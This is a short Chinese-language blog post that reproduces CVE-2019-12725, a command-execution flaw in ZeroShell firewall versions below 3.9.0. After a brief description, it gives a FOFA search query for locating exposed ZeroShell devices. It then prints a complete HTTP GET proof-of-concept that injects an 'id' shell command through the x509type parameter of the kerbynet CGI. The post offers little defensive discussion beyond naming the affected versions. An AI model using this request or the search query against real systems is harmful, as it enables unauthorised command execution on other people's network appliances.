某防火墙命令执行复现

漏洞介绍:

ZoreShell防火墙版本小于3.9.0存在命令执行(CVE-2019-12725),Zeroshell是一个微型的linux发行版本,它功能强大,具有强大的router、radius、web门户、防火墙、virtual**、Qos、 DHCP、dns转发等功能,可以用来安装到服务器上为内网提供网络服务。

 

FOFA语法:

app="Zeroshell-防火墙"


 

复现poc

1 GET /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aid%0A%27 HTTP/1.1
2 Host: xxxxxxxx
3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
5 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 Connection: close
7 Upgrade-Insecure-Requests: 1
8 Cache-Control: max-age=0

 

数据包修改

 

posted @ 2021-05-24 01:12  蓝银花  阅读(415)  评论(0编辑  收藏  举报
Live2D